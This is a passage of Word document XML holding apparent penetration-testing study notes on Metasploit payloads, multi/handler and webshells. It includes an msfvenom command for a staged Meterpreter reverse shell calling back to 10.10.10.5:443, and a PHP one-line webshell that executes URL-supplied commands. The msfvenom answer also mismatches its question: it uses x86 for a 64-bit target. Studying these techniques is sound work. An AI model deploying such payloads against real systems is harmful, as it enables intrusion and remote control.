      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005846BE" w:rsidRPr="0084205E">
        <w:t>actually contain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005846BE" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> any reverse shell code by itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A2E333" w14:textId="4224784A" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>connects to listener and downloads the actual payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C278F8B" w14:textId="77AAB9A7" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>bulkier reverse shell code is downloaded when stager is activated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA127DD" w14:textId="307C6D40" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>require special Metasploit multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5794F8" w14:textId="41306654" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>stageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – more common – entirely self-contained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D27FDA" w14:textId="0C2E5C87" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>easier to use and catch, bulkier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A06874" w14:textId="7584C38B" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>easier for AV or IDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014EAF13" w14:textId="5664354D" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5DB4D8" w14:textId="29FB46FF" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Metasploit brand of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fully-featured</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF5C29" w14:textId="2CC06808" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>completely stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C63BCFE" w14:textId="660CDA1D" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>go for windows targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161888DE" w14:textId="5402DBF7" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>must be caught in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B694A25" w14:textId="733CFE8B" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>banned from certain certification examinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE1981" w14:textId="3B47C200" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Payload Naming Conventions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA4527" w14:textId="7487C2FB" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;OS&gt;/&lt;arch&gt;/&lt;payload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FFBF7" w14:textId="6C9E3912" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>stageless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> payloads are denoted with underscores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D005311" w14:textId="16B597DD" w:rsidR="005846BE" w:rsidRPr="0084205E" w:rsidRDefault="005846BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">staged payloads are denoted by forward </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>slahes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F8FB4C7" w14:textId="6A3CD361" w:rsidR="00F9514F" w:rsidRPr="0084205E" w:rsidRDefault="00F9514F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">What command would you use to generate a staged </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A861086" w14:textId="3C58EEC3" w:rsidR="00F9514F" w:rsidRPr="0084205E" w:rsidRDefault="00F9514F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -f elf -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> LHOST=10.10.10.5 LPORT=443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC737A" w14:textId="2345C5C5" w:rsidR="00F9514F" w:rsidRPr="0084205E" w:rsidRDefault="00F9514F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Metasploit multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0E8FD" w14:textId="23B37993" w:rsidR="00FF67F6" w:rsidRPr="0084205E" w:rsidRDefault="00FF67F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">catching reverse shells, essential for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and go-to for staged payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374BC2C3" w14:textId="50FC6CBE" w:rsidR="00FF67F6" w:rsidRPr="0084205E" w:rsidRDefault="00FF67F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE487F7" w14:textId="57F8ACB3" w:rsidR="00FF67F6" w:rsidRPr="0084205E" w:rsidRDefault="00FF67F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A063CF2" w14:textId="7A3F88E7" w:rsidR="00FF67F6" w:rsidRPr="0084205E" w:rsidRDefault="00FF67F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72740837" w14:textId="4260295D" w:rsidR="00FF67F6" w:rsidRPr="0084205E" w:rsidRDefault="00FF67F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>set payload, LHOST, LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1F99A4" w14:textId="5EFF9D35" w:rsidR="00FF67F6" w:rsidRPr="0084205E" w:rsidRDefault="00FF67F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>exploit -j to start listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3EDC43" w14:textId="24982791" w:rsidR="00FF67F6" w:rsidRPr="0084205E" w:rsidRDefault="00FF67F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C32B0E7" w14:textId="1F2F6159" w:rsidR="00FF67F6" w:rsidRPr="0084205E" w:rsidRDefault="00FF67F6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> when reverse or bind shells are not an option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B647EE" w14:textId="23FD9018" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>runs inside a webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518DB645" w14:textId="03598354" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usually</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> PHP or ASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0FED82" w14:textId="3C794DED" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>common scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AF52E5" w14:textId="7F876AB5" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;?php echo "&lt;pre&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>($_GET["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>"]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>) .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> "&lt;/pre&gt;"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09159453" w14:textId="2247BCA3" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">takes GET parameter in the URL and execute it on the system with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C8D10" w14:textId="014938F0" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">any commands entered in URL </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>after ?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>= will be executed on the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A0150" w14:textId="54D2AA73" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GET parameter “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” with command “ifconfig” for example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1E973" w14:textId="5702667E" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PentestMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> php-reverse-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1222C126" w14:textId="0111C281" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>most generic, language specific shells are written for Unix based, will not work on Windows by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F7D65" w14:textId="6BE05518" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">for windows, obtain RCE using a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to generate a reverse/bind shell in the language of the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D6BFD" w14:textId="344F1B4A" w:rsidR="001837B7" w:rsidRPr="0084205E" w:rsidRDefault="001837B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
